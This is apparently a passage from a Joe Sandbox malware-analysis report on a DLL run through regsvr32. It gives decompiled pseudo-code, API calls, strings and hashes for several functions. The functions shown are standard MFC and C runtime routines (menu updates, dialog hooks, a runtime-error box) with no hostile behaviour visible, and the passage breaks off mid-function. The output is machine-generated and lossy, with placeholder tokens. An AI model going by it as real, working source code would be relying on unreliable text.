Function 10024FBB Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 273
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10024FBB(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v32;
				char _v268;
				char _v292;
				char _v296;
				signed int _v300;
				CHAR* _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				void* __ebp;
				signed int _t102;
				intOrPtr _t106;
				signed int _t108;
				signed int _t110;
				int* _t118;
				signed int _t125;
				signed int _t128;
				signed int _t132;
				void* _t136;
				intOrPtr* _t138;
				void* _t170;
				intOrPtr* _t171;
				void* _t173;
				int _t175;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t180;
				intOrPtr* _t181;
				signed int _t182;
				intOrPtr _t183;
				signed char _t196;
				signed char _t197;
				signed int _t217;
				intOrPtr* _t219;
				intOrPtr* _t220;
				void* _t223;
				intOrPtr* _t224;
				signed int _t226;
				void* _t228;
				void* _t229;
				void* _t230;

				_t223 = __esi;
				_t181 = __ecx;
				_t170 = __ebx;
				_t102 =  *0x1004c470; // 0xf256d946
				_push(__esi);
				_push(__edi);
				_v8 = _t102;
				_t219 = __ecx;
				if(_a4 == 0 || lstrlenA(_a4) >= 0x104) {
					L10:
					_push(0);
					_push(0xffffffff);
					_push(3);
					E10027180(_t181);
					asm("int3");
					E10011BF0(0x1003ab29, _t228);
					_t230 = _t229 - 0x12c;
					_t106 =  *0x1004c470; // 0xf256d946
					_push(_t170);
					_push(_t223);
					_t224 = _a4;
					_push(_t219);
					_t220 = _t181;
					_t182 =  *(_t224 + 0xc);
					_v20 = _t106;
					_t171 = _t220 + 0x1c;
					_t108 =  *( *_t171 - 0xc);
					__eflags = _t108;
					if(_t108 == 0) {
						__eflags = _t182;
						if(_t182 != 0) {
							E10026397(_t182,  *(_t224 + 4), _t171, _t108);
						}
					}
					_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t220 + 8))));
					_t110 = 0;
					__eflags =  *(_t183 - 0xc);
					if( *(_t183 - 0xc) != 0) {
						__eflags =  *(_t224 + 0xc);
						if( *(_t224 + 0xc) != 0) {
							_t173 = 0;
							__eflags =  *(_t220 + 4);
							if( *(_t220 + 4) > 0) {
								do {
									DeleteMenu( *( *(_t224 + 0xc) + 4),  *(_t224 + 4) + _t173, 0);
									_t173 = _t173 + 1;
									__eflags = _t173 -  *(_t220 + 4);
								} while (_t173 <  *(_t220 + 4));
							}
							_t110 = GetCurrentDirectoryA(0x104,  &_v292);
							__eflags = _t110;
							if(_t110 != 0) {
								__eflags = _t110 - 0x104;
								if(_t110 < 0x104) {
									_t175 = lstrlenA( &_v292);
									 *((char*)(_t228 + _t175 - 0x120)) = 0x5c;
									_t176 = _t175 + 1;
									_v308 = _t176;
									 *((char*)(_t228 + _t176 - 0x120)) = 0;
									_v300 =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
									_v8 = _v8 & 0x00000000;
									_t118 = E100243B2();
									_t216 =  *_t118;
									_v296 =  *((intOrPtr*)( *_t118 + 0xc))() + 0x10;
									_a4 = _a4 & 0x00000000;
									__eflags =  *(_t220 + 4);
									_v8 = 1;
									if( *(_t220 + 4) > 0) {
										while(1) {
											_t125 =  *((intOrPtr*)( *_t220 + 8))( &_v300, _a4,  &_v292, _t176, 1);
											__eflags = _t125;
											if(_t125 == 0) {
												goto L40;
											}
											_t177 = _v300;
											_t128 = E100017D0( &_v296,  *((intOrPtr*)(_t177 - 0xc)) +  *((intOrPtr*)(_t177 - 0xc)));
											while(1) {
												_t196 =  *_t177;
												__eflags = _t196;
												if(_t196 == 0) {
													break;
												}
												__eflags = _t196 - 0x26;
												if(_t196 == 0x26) {
													 *_t128 = _t196;
													_t128 = _t128 + 1;
													__eflags = _t128;
												}
												_t197 =  *_t177;
												_t217 = _t197 & 0x000000ff;
												__eflags =  *(_t217 + 0x10050a81) & 0x00000004;
												if(( *(_t217 + 0x10050a81) & 0x00000004) != 0) {
													 *_t128 = _t197;
													_t128 = _t128 + 1;
													_t177 = _t177 + 1;
													__eflags = _t177;
												}
												 *_t128 =  *_t177;
												_t128 = _t128 + 1;
												_t177 = _t177 + 1;
												__eflags = _t177;
											}
											 *_t128 = _t196;
											E10006CE2(_t177,  &_v296, _t220, 0xffffffff);
											_t132 =  *((intOrPtr*)(_t220 + 0x14)) + _a4 + 0x00000001 & 0x0000000f;
											__eflags = _t132 - 0xa;
											if(__eflags <= 0) {
												if(__eflags != 0) {
													wsprintfA( &_v32, ??, "&%d ", _t132);
													goto L38;
												} else {
													lstrcpyA( &_v32, "1&0 ");
												}
											} else {
												wsprintfA( &_v32, ??, "%d ", _t132);
												L38:
												_t230 = _t230 + 0xc;
											}
											_push( &_v32);
											_t136 = E10006B11( &_v312, __eflags);
											_push( &_v296);
											_push(_t136);
											_push( &_v316);
											_v8 = 2;
											_t138 = E10024DC7( &_v296, __eflags);
											_t216 =  *(_t224 + 8);
											_t203 =  *(_t224 + 4);
											_t77 = _t216 + 1; // 0x1
											 *(_t224 + 8) = _t77;
											_t79 = _t203 + 1; // 0x3
											_t230 = _t230 + 0xc;
											 *(_t224 + 4) = _t79;
											_v304 =  *_t138;
											InsertMenuA( *( *(_t224 + 0xc) + 4),  *(_t224 + 8), 0x400,  *(_t224 + 4), _v304);
											E100014B0(_v316 + 0xfffffff0,  *(_t224 + 8));
											_v8 = 1;
											E100014B0(_v312 + 0xfffffff0,  *(_t224 + 8));
											_a4 = _a4 + 1;
											__eflags = _a4 -  *(_t220 + 4);
											if(_a4 <  *(_t220 + 4)) {
												_t176 = _v308;
												continue;
											}
											goto L40;
										}
									}
									L40:
									 *(_t224 + 8) =  *(_t224 + 8) - 1;
									 *((intOrPtr*)(_t224 + 0x20)) = GetMenuItemCount( *( *(_t224 + 0xc) + 4));
									 *((intOrPtr*)(_t224 + 0x18)) = 1;
									E100014B0(_v296 + 0xfffffff0, _t216);
									__eflags = _v300 + 0xfffffff0;
									_t110 = E100014B0(_v300 + 0xfffffff0, _t216);
								}
							}
						}
					} else {
						_t180 =  *_t171;
						__eflags =  *(_t180 - 0xc);
						if( *(_t180 - 0xc) != 0) {
							 *((intOrPtr*)( *_t224 + 0xc))(_t180);
						}
						_t110 =  *((intOrPtr*)( *_t224))(0);
					}
					 *[fs:0x0] = _v16;
					return E100117AE(_t110, _v20);
				} else {
					_push(_a4);
					_push( &_v268);
					if(E1002592C(__ebx, _t219, __esi) == 0) {
						goto L10;
					} else {
						_t226 = 0;
						if( *((intOrPtr*)(_t219 + 4)) - 1 > 0) {
							while(E1002535C(_t170, _t219, _t226,  *((intOrPtr*)( *((intOrPtr*)(_t219 + 8)) + _t226 * 4)),  &_v268) == 0) {
								_t226 = _t226 + 1;
								if(_t226 <  *((intOrPtr*)(_t219 + 4)) - 1) {
									continue;
								} else {
								}
								L8:
								while(_t226 > 0) {
									E100074A5(_t170,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4, _t228,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4 - 4);
									_t226 = _t226 - 1;
									__eflags = _t226;
								}
								goto L9;
							}
							goto L8;
						}
						L9:
						return E100117AE(E10006AEC( *((intOrPtr*)(_t219 + 8)),  &_v268), _v8);
					}
				}
			}

0x10024fbb
0x10024fbb
0x10024fbb
0x10024fc8
0x10024fcd
0x10024fce
0x10024fcf
0x10024fd2
0x10024fd4
0x1002505a
0x1002505a
0x1002505c
0x1002505e
0x10025060
0x10025065
0x1002506b
0x10025070
0x10025076
0x1002507b
0x1002507c
0x1002507d
0x10025080
0x10025081
0x10025083
0x10025086
0x10025089
0x1002508e
0x10025091
0x10025093
0x10025095
0x10025097
0x1002509e
0x1002509e
0x10025097
0x100250a6
0x100250a8
0x100250aa
0x100250ad
0x100250cb
0x100250ce
0x100250d4
0x100250d6
0x100250d9
0x100250db
0x100250e9
0x100250ef
0x100250f0
0x100250f0
0x100250db
0x10025102
0x10025108
0x1002510a
0x10025110
0x10025112
0x10025125
0x10025127
0x1002512f
0x10025130
0x10025136
0x1002514d
0x10025153
0x10025157
0x1002515c
0x10025166
0x1002516c
0x10025170
0x10025174
0x10025178
0x10025186
0x1002519e
0x100251a1
0x100251a3
0x00000000
0x00000000
0x100251a9
0x100251bb
0x100251e2
0x100251e2
0x100251e4
0x100251e6
0x00000000
0x00000000
0x100251c2
0x100251c5
0x100251c7
0x100251c9
0x100251c9
0x100251c9
0x100251ca
0x100251cc
0x100251cf
0x100251d6
0x100251d8
0x100251da
0x100251db
0x100251db
0x100251db
0x100251de
0x100251e0
0x100251e1
0x100251e1
0x100251e1
0x100251e8
0x100251f2
0x10025201
0x10025204
0x10025207
0x10025211
0x1002522e
0x00000000
0x10025213
0x1002521c
0x1002521c
0x10025209
0x1002522e
0x1002522a
0x10025234
0x10025234
0x1002523a
0x10025241
0x1002524c
0x1002524d
0x10025254
0x10025255
0x10025259
0x1002525e
0x10025261
0x10025264
0x10025267
0x1002526a
0x1002526d
0x10025270
0x10025275
0x1002528e
0x1002529d
0x100252ab
0x100252af
0x100252b4
0x100252ba
0x100252bd
0x10025180
0x00000000
0x10025180
0x00000000
0x100252bd
0x10025186
0x100252c3
0x100252c6
0x100252db
0x100252de
0x100252e5
0x100252f0
0x100252f3
0x100252f3
0x10025112
0x1002510a
0x100250af
0x100250af
0x100250b1
0x100250b4
0x100250bb
0x100250bb
0x100250c4
0x100250c4
0x100252fd
0x1002530e
0x10024fea
0x10024fea
0x10024ff3
0x10024ffb
0x00000000
0x10024ffd
0x10025000
0x10025005
0x10025007
0x10025021
0x10025025
0x00000000
0x00000000
0x10025027
0x00000000
0x10025039
0x10025033
0x10025038
0x10025038
0x10025038
0x00000000
0x10025039
0x00000000
0x10025007
0x1002503d
0x10025057
0x10025057
0x10024ffb

APIs

lstrlenA.KERNEL32(00000000), ref: 10024FDD
__EH_prolog.LIBCMT ref: 1002506B
DeleteMenu.USER32(?,?,00000000), ref: 100250E9
GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 10025102
lstrlenA.KERNEL32(?), ref: 1002511F
wsprintfA.USER32 ref: 1002522E

Part of subcall function 1002592C: __EH_prolog.LIBCMT ref: 10025931
Part of subcall function 1002592C: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
Part of subcall function 1002592C: lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C

lstrcpyA.KERNEL32(?,1&0 ,000000FF,?), ref: 1002521C
InsertMenuA.USER32(00000002,00000000,00000400,00000002,?), ref: 1002528E
GetMenuItemCount.USER32 ref: 100252CC

Part of subcall function 1002535C: lstrcmpiA.KERNEL32(?,00000000), ref: 10025375

Strings

1&0 , xrefs: 10025213
%d , xrefs: 1002520A
&%d , xrefs: 10025225
\, xrefs: 10025127

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Menu$H_prologlstrlen$CountCurrentDeleteDirectoryFullInsertItemNamePathlstrcmpilstrcpylstrcpynwsprintf
String ID: %d $&%d $1&0 $\
API String ID: 342826643-2399880791
Opcode ID: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
Instruction ID: 8aad9e791dd0b61d4e6d294f68b120ef5cdd25e9988c916dda0b03ab33557493
Opcode Fuzzy Hash: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
Instruction Fuzzy Hash: 31B1BD34900215DFDB10CF64DC84FAAB7B4FF09345F508699E59A8B292DB31EA84CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1001D28C Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 123
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E1001D28C(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* __ebp;
				signed int _t31;
				signed int _t33;
				void* _t40;
				int _t46;
				intOrPtr _t64;
				signed int* _t65;
				void* _t67;
				intOrPtr* _t69;

				if(_a4 != 0) {
					_push(0x100347fd);
					_t53 = 0x1004efe8;
					_t67 = E10037855(0x1004efe8);
					__eflags =  *(_t67 + 0x18);
					if( *(_t67 + 0x18) != 0) {
						_push(_a4);
						__eflags = E10022115();
						if(__eflags == 0) {
							_t53 =  *(_t67 + 0x18);
							E10022DAA( *(_t67 + 0x18), __eflags, _a4);
							 *(_t67 + 0x18) = 0;
						}
					}
					_t64 = _a8;
					__eflags = _t64 - 0x110;
					if(_t64 != 0x110) {
						__eflags = _t64 -  *0x1004f3b8; // 0x0
						if(__eflags == 0) {
							L22:
							SendMessageA(_a4, 0x111, 0xe146, 0);
							_t31 = 1;
							__eflags = 1;
							goto L23;
						}
						__eflags = _t64 - 0x111;
						if(_t64 != 0x111) {
							L10:
							__eflags = _t64 - 0xc000;
							if(_t64 >= 0xc000) {
								_push(_a4);
								_t69 = E10022115();
								_t33 = E100244DE(_t69, 0x10040f58);
								__eflags = _t33;
								if(_t33 == 0) {
									L14:
									__eflags = _t64 -  *0x1004f3ac; // 0x0
									if(__eflags != 0) {
										__eflags = _t64 -  *0x1004f3b0; // 0x0
										if(__eflags != 0) {
											__eflags = _t64 -  *0x1004f3a8; // 0x0
											if(__eflags != 0) {
												__eflags = _t64 -  *0x1004f3b4; // 0x0
												if(__eflags != 0) {
													goto L11;
												}
												_t31 =  *((intOrPtr*)( *_t69 + 0x158))();
												goto L23;
											}
											 *((intOrPtr*)( *_t69 + 0x160))(_a12, _a16 & 0x0000ffff, _a16 >> 0x10);
											goto L11;
										}
										_t19 = _t69 + 0x1c0; // 0x1c0
										_t65 = _t19;
										 *_t65 = _a16;
										_t31 =  *((intOrPtr*)( *_t69 + 0x15c))();
										 *_t65 =  *_t65 & 0x00000000;
										goto L23;
									}
									_t31 =  *((intOrPtr*)( *_t69 + 0x158))(_a16);
									goto L23;
								}
								_t40 = E1001CE89(_t69);
								__eflags =  *(_t40 + 0x36) & 0x00000008;
								if(( *(_t40 + 0x36) & 0x00000008) != 0) {
									goto L11;
								}
								goto L14;
							}
							L11:
							_t31 = 0;
							goto L23;
						}
						__eflags = _a12 - 0x40e;
						if(_a12 == 0x40e) {
							goto L22;
						}
						goto L10;
					} else {
						 *0x1004f3a8 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
						 *0x1004f3ac = RegisterClipboardFormatA("commdlg_ShareViolation");
						 *0x1004f3b0 = RegisterClipboardFormatA("commdlg_FileNameOK");
						 *0x1004f3b4 = RegisterClipboardFormatA("commdlg_ColorOK");
						 *0x1004f3b8 = RegisterClipboardFormatA("commdlg_help");
						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
						_push(_a16);
						 *0x1004f3bc = _t46;
						_push(_a12);
						_t31 = E1001EB68(_t53, _a4, 0x110);
						L23:
						return _t31;
					}
				}
				return 0;
			}

0x1001d295
0x1001d29f
0x1001d2a4
0x1001d2ae
0x1001d2b0
0x1001d2b3
0x1001d2b5
0x1001d2bd
0x1001d2bf
0x1001d2c4
0x1001d2c7
0x1001d2cc
0x1001d2cc
0x1001d2bf
0x1001d2cf
0x1001d2d8
0x1001d2da
0x1001d33e
0x1001d349
0x1001d40c
0x1001d417
0x1001d41f
0x1001d41f
0x00000000
0x1001d41f
0x1001d34f
0x1001d351
0x1001d35f
0x1001d35f
0x1001d365
0x1001d36e
0x1001d376
0x1001d37f
0x1001d384
0x1001d386
0x1001d395
0x1001d395
0x1001d39b
0x1001d3ac
0x1001d3b2
0x1001d3ce
0x1001d3d4
0x1001d3f4
0x1001d3fa
0x00000000
0x00000000
0x1001d404
0x00000000
0x1001d404
0x1001d3e9
0x00000000
0x1001d3e9
0x1001d3b7
0x1001d3b7
0x1001d3bd
0x1001d3c3
0x1001d3c9
0x00000000
0x1001d3c9
0x1001d3a4
0x00000000
0x1001d3a4
0x1001d38a
0x1001d38f
0x1001d393
0x00000000
0x00000000
0x00000000
0x1001d393
0x1001d367
0x1001d367
0x00000000
0x1001d367
0x1001d353
0x1001d359
0x00000000
0x00000000
0x00000000
0x1001d2dc
0x1001d2ee
0x1001d2fa
0x1001d306
0x1001d312
0x1001d31e
0x1001d323
0x1001d325
0x1001d328
0x1001d32d
0x1001d334
0x1001d420
0x00000000
0x1001d421
0x1001d2da
0x00000000

APIs

RegisterClipboardFormatA.USER32(commdlg_LBSelChangedNotify), ref: 1001D2E7
RegisterClipboardFormatA.USER32(commdlg_ShareViolation), ref: 1001D2F3
RegisterClipboardFormatA.USER32(commdlg_FileNameOK), ref: 1001D2FF
RegisterClipboardFormatA.USER32(commdlg_ColorOK), ref: 1001D30B
RegisterClipboardFormatA.USER32(commdlg_help), ref: 1001D317
RegisterClipboardFormatA.USER32(commdlg_SetRGBColor), ref: 1001D323

Strings

commdlg_LBSelChangedNotify, xrefs: 1001D2E2
commdlg_ColorOK, xrefs: 1001D301
commdlg_ShareViolation, xrefs: 1001D2E9
commdlg_FileNameOK, xrefs: 1001D2F5
commdlg_help, xrefs: 1001D30D
commdlg_SetRGBColor, xrefs: 1001D319

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ClipboardFormatRegister
String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
API String ID: 1228543026-3888057576
Opcode ID: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
Instruction ID: 90b801e29acbd5a70dd584596d4e007027562c874008bfc0544b1ea411f40a0f
Opcode Fuzzy Hash: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
Instruction Fuzzy Hash: E7418071A00265EFDB21FF25CC889AE3BE1EB44391B12442AF905DB251DB30EA91CB95

Uniqueness

Uniqueness Score: -1.00%

Function 10016994 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 115
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 71%

			E10016994() {
				intOrPtr _t20;
				int _t21;
				long _t24;
				void* _t31;
				void* _t51;
				long _t52;
				void* _t57;
				signed int _t67;
				void** _t69;
				void* _t70;
				void* _t72;
				void* _t73;

				_t70 = _t72 - 0x8c;
				_t73 = _t72 - 0x10c;
				_t20 =  *0x1004c470; // 0xf256d946
				_t52 =  *(_t70 + 0x94);
				 *((intOrPtr*)(_t70 + 0x88)) = _t20;
				_t21 = 0;
				while(_t52 !=  *((intOrPtr*)(0x1004cb88 + _t21 * 8))) {
					_t21 = _t21 + 1;
					if(_t21 < 0x13) {
						continue;
					}
					break;
				}
				_t67 = _t21 << 3;
				_t6 = _t67 + 0x1004cb88; // 0x28000000
				if(_t52 ==  *_t6) {
					_t21 =  *0x1004f3d4; // 0x0
					if(_t21 == 1 || _t21 == 0 &&  *0x1004f3d8 == 1) {
						_t17 = _t67 + 0x1004cb8c; // 0x10042328
						_t69 = _t17;
						_t24 = E10011820( *_t69);
						_t21 = WriteFile(GetStdHandle(0xfffffff4),  *_t69, _t24, _t70 + 0x94, 0);
					} else {
						if(_t52 != 0xfc) {
							 *((char*)(_t70 + 0x84)) = 0;
							if(GetModuleFileNameA(0, _t70 - 0x80, 0x104) == 0) {
								E10017B90(_t70 - 0x80, "<program name unknown>");
							}
							_t63 = _t70 - 0x80;
							if(E10011820(_t70 - 0x80) + 1 > 0x3c) {
								E10019E20(E10011820(_t63) + _t70 - 0x45, "...", 3);
								_t73 = _t73 + 0x10;
							}
							_t31 = E10011820(_t63);
							_t12 = _t67 + 0x1004cb8c; // 0x10042328
							_t14 = E10011820( *_t12) + 0x1c; // 0x1c
							_pop(_t57);
							E10010B20(_t31 + _t14 + 0x00000003 & 0xfffffffc, _t57);
							_t51 = _t73;
							E10017B90(_t51, "Runtime Error!\n\nProgram: ");
							E10017BA0(_t51, _t63);
							E10017BA0(_t51, "\n\n");
							_t15 = _t67 + 0x1004cb8c; // 0x10042328
							E10017BA0(_t51,  *_t15);
							_push(0x12010);
							_push("Microsoft Visual C++ Runtime Library");
							_push(_t51);
							_t21 = E10019D1D();
						}
					}
				}
				return E100117AE(_t21,  *((intOrPtr*)(_t70 + 0x88)));
			}

0x10016995
0x1001699c
0x100169a2
0x100169a7
0x100169af
0x100169b8
0x100169ba
0x100169c3
0x100169c7
0x00000000
0x00000000
0x00000000
0x100169c7
0x100169cb
0x100169ce
0x100169d4
0x100169da
0x100169e2
0x10016acf
0x10016acf
0x10016ad7
0x10016ae9
0x100169f9
0x100169ff
0x10016a0f
0x10016a1d
0x10016a28
0x10016a2e
0x10016a2f
0x10016a3f
0x10016a5b
0x10016a60
0x10016a60
0x10016a64
0x10016a69
0x10016a76
0x10016a7e
0x10016a82
0x10016a87
0x10016a8f
0x10016a96
0x10016aa1
0x10016aa6
0x10016aad
0x10016ab2
0x10016ab7
0x10016abc
0x10016abd
0x10016ac2
0x100169ff
0x100169e2
0x10016b0a

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 10016A15
_strlen.LIBCMT ref: 10016A35
_strlen.LIBCMT ref: 10016A44
_strncpy.LIBCMT ref: 10016A5B
_strlen.LIBCMT ref: 10016A64
_strlen.LIBCMT ref: 10016A71
_strlen.LIBCMT ref: 10016AD7
GetStdHandle.KERNEL32(000000F4,10042328,00000000,?,00000000,00000000,00000000,00000000), ref: 10016AE2
WriteFile.KERNEL32(00000000), ref: 10016AE9

Strings

<program name unknown>, xrefs: 10016A22
..., xrefs: 10016A55
Microsoft Visual C++ Runtime Library, xrefs: 10016AB7
Runtime Error!Program: , xrefs: 10016A89

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _strlen$File$HandleModuleNameWrite_strncpy
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 190417973-4022980321
Opcode ID: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
Instruction ID: a98b9a16bc0a3033c6b9ef3d9cc886c10ccef6c9644ec2f046cd71b0d49ba214
Opcode Fuzzy Hash: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
Instruction Fuzzy Hash: 6331F4765002146BEB21EB74CCD6EAA37BDEF48250F10891AF545EB142EF34F9C98B64

Uniqueness

Uniqueness Score: -1.00%

Function 1000FCF8 Relevance: 22.9, APIs: 15, Instructions: 359
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1000FCF8(signed int __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t112;
				signed int _t115;
				signed int _t118;
				signed char _t119;
				signed int _t122;
				signed int _t123;
				signed int _t127;
				void* _t132;
				signed char _t136;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed char _t147;
				intOrPtr _t148;
				signed int _t149;
				short _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t160;
				signed int _t163;
				signed char _t164;
				signed int _t165;
				signed int _t166;
				short _t169;
				WPARAM _t171;
				signed int _t172;
				signed int* _t173;
				void* _t174;
				void* _t188;
				struct tagMSG* _t192;
				signed int _t193;
				signed int _t195;
				int _t197;
				signed int _t198;
				int _t201;
				signed int _t202;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t210;
				void* _t212;

				_t185 = __ecx;
				E10011BF0(0x1003b09e, _t210);
				_t112 =  *(_t210 + 8);
				 *((intOrPtr*)(_t210 - 0x10)) = _t212 - 0x20;
				if(_t112 != 0) {
					 *(_t210 - 0x28) =  *(_t112 + 0x1c);
				} else {
					 *(_t210 - 0x28) =  *(_t210 - 0x28) & _t112;
				}
				_t192 =  *(_t210 + 0xc);
				_t201 = _t192->message;
				 *(_t210 - 0x18) = _t201;
				 *(_t210 - 0x2c) = GetFocus();
				_t115 = E100220EE(_t210, _t114);
				_t180 = 0x100;
				 *(_t210 - 0x14) = _t115;
				if(_t201 < 0x100 || _t201 > 0x109) {
					if(_t201 < 0x200 || _t201 > 0x209) {
						goto L27;
					} else {
						goto L7;
					}
				} else {
					L7:
					if(_t115 == 0) {
						L27:
						 *((intOrPtr*)(_t210 - 0x1c)) = E100220EE(_t210, _t192->hwnd);
						_t202 = 0;
						 *(_t210 - 0x24) =  *(_t210 - 0x24) & 0;
						_t118 =  *(_t210 - 0x18) - _t180;
						__eflags = _t118;
						 *((intOrPtr*)(_t210 - 0x20)) = 2;
						if(_t118 == 0) {
							_t119 = E1000F57E( *((intOrPtr*)(_t210 - 0x1c)), _t192);
							_t185 = _t192->wParam & 0x0000ffff;
							__eflags = _t185 - 0x1b;
							if(__eflags > 0) {
								__eflags = _t185 - 0x25;
								if(_t185 < 0x25) {
									L47:
									_t193 = IsDialogMessageA( *( *(_t210 + 8) + 0x1c),  *(_t210 + 0xc));
									__eflags = _t193;
									if(_t193 != 0) {
										_t132 = E100220EE(_t210, GetFocus());
										__eflags = _t132 -  *(_t210 - 0x14);
										if(_t132 !=  *(_t210 - 0x14)) {
											E1000F9FD(_t180, _t185, _t193, GetFocus, E100220EE(_t210, GetFocus()));
											_pop(_t185);
										}
									}
									L50:
									_t122 = IsWindow( *(_t210 - 0x2c));
									__eflags = _t122;
									if(_t122 != 0) {
										E1000FA6A(_t185, _t210,  *(_t210 - 0x14), E100220EE(_t210, GetFocus()));
										_pop(_t188);
										_t127 = IsWindow( *(_t210 - 0x28));
										__eflags = _t127;
										if(_t127 != 0) {
											E1000FC18(_t188,  *(_t210 + 8),  *(_t210 - 0x14), E100220EE(_t210, GetFocus()));
										}
									}
									_t123 = _t193;
									goto L54;
								}
								__eflags = _t185 - 0x26;
								if(_t185 <= 0x26) {
									 *(_t210 - 0x24) = 1;
									L81:
									_t136 = E1000F57E( *(_t210 - 0x14), _t192);
									__eflags = _t136 & 0x00000001;
									if((_t136 & 0x00000001) != 0) {
										goto L47;
									}
									__eflags =  *(_t210 - 0x24);
									_t185 =  *(_t210 + 8);
									_push(0);
									if( *(_t210 - 0x24) == 0) {
										_t137 = E10020753(_t185);
									} else {
										_t137 = E10020657(_t185);
									}
									_t206 = _t137;
									__eflags = _t206;
									if(_t206 == 0) {
										goto L47;
									} else {
										__eflags =  *(_t206 + 8);
										if( *(_t206 + 8) != 0) {
											_t185 =  *(_t210 + 8);
											E1002084F( *(_t210 + 8), _t206);
										}
										__eflags =  *(_t206 + 4);
										if( *(_t206 + 4) == 0) {
											_t138 =  *_t206;
											__eflags = _t138;
											if(_t138 == 0) {
												_t185 =  *(_t210 + 8);
												_t139 = E1000F62D( *(_t210 + 8),  *(_t210 - 0x14),  *(_t210 - 0x24));
											} else {
												_t139 = E100220EE(_t210, _t138);
											}
											_t195 = _t139;
											__eflags = _t195;
											if(_t195 == 0) {
												goto L47;
											} else {
												 *((intOrPtr*)( *((intOrPtr*)( *(_t210 + 8) + 0x48)) + 0x6c)) = 0;
												E1000F667(_t195);
												__eflags =  *(_t206 + 8);
												if( *(_t206 + 8) != 0) {
													SendMessageA( *(_t195 + 0x1c), 0xf1, 1, 0);
												}
												goto L90;
											}
										} else {
											_t185 =  *(_t206 + 4);
											 *((intOrPtr*)( *( *(_t206 + 4)) + 0xac))(_t192);
											L90:
											_t193 = 1;
											goto L50;
										}
									}
								}
								__eflags = _t185 - 0x28;
								if(_t185 <= 0x28) {
									goto L81;
								}
								__eflags = _t185 - 0x2b;
								if(_t185 != 0x2b) {
									goto L47;
								}
								L68:
								__eflags = _t119 & 0x00000004;
								if((_t119 & 0x00000004) != 0) {
									goto L47;
								}
								_t147 = E1000F60C( *(_t210 - 0x14));
								__eflags = _t147 & 0x00000010;
								_pop(_t185);
								if((_t147 & 0x00000010) == 0) {
